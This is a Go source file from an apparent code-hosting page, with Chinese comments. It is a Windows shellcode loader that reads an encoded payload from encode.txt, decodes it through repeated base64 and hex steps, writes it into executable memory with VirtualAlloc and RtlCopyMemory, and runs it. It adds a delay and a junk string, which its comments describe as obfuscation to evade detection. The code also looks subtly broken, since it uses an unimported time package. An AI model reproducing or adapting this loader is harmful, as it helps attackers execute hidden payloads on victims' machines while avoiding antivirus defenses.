-
Notifications
You must be signed in to change notification settings - Fork 12
/
main.go
81 lines (67 loc) · 2.43 KB
/
main.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
package main
import (
"encoding/base64"
"encoding/hex"
"fmt"
"io/ioutil"
"os"
"syscall"
"unsafe"
)
const (
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READWRITE = 0x40
)
var (
kernel32 = syscall.MustLoadDLL("kernel32.dll") //调用kernel32.dll
ntdll = syscall.MustLoadDLL("ntdll.dll") //调用ntdll.dll
VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") //使用kernel32.dll调用ViretualAlloc函数
RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory") //使用ntdll调用RtCopyMemory函数
)
func checkErr(err error) {
if err != nil { // 如果内存调用出现错误,可以报出
if err.Error() != "The operation completed successfully." {
println(err.Error())
os.Exit(1)
}
}
}
func Readcode() string {
f, err := ioutil.ReadFile("encode.txt")
//为我们需要加载的shellcode文件,这里可以使用其他格式的文件来进行混淆
if err != nil {
fmt.Println("read fail", err)
}
return string(f)
}
func Base64DecodeString(str string) string {
resBytes, _ := base64.StdEncoding.DecodeString(str)
return string(resBytes)
}
func main() {
time.Sleep(60 * time.Second)
// 内存加载shellcode前,先压入一段无关字符串用来混淆
var c string = "sgamfygyjffqrqwxzcvzxbsdwdqbsdbgagqwQWRQW/.OAUSHCNIADOdjfqwSFADOQIWOIJOGWEMPOSDPOOPasffvaSFAsafwfYRinJD3124651612qwrE02e"
// 调用VirtualAllo申请一块内存
addr1, _, err := VirtualAlloc.Call(0, uintptr(len(c)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
//调用RtlCopyMemory加载进内存当中
_, _, err = RtlCopyMemory.Call(addr1, (uintptr)(unsafe.Pointer(&c)), uintptr(len(c)/2))
Str := Readcode() // 加载 shellcode
deStrBytes := Base64DecodeString(Str) // 4次base64解码
for i := 0; i < 3; i++ {
deStrBytes = Base64DecodeString(deStrBytes)
}
shellcode, err := hex.DecodeString(deStrBytes)
// 调用VirtualAllo申请一块内存
addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
if addr == 0 {
checkErr(err)
}
// 调用RtlCopyMemory加载进内存当中
_, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)/2))
_, _, err = RtlCopyMemory.Call(addr+uintptr(len(shellcode)/2), (uintptr)(unsafe.Pointer(&shellcode[len(shellcode)/2])), uintptr(len(shellcode)/2))
checkErr(err)
//syscall来运行shellcode
syscall.Syscall(addr, 0, 0, 0, 0)
}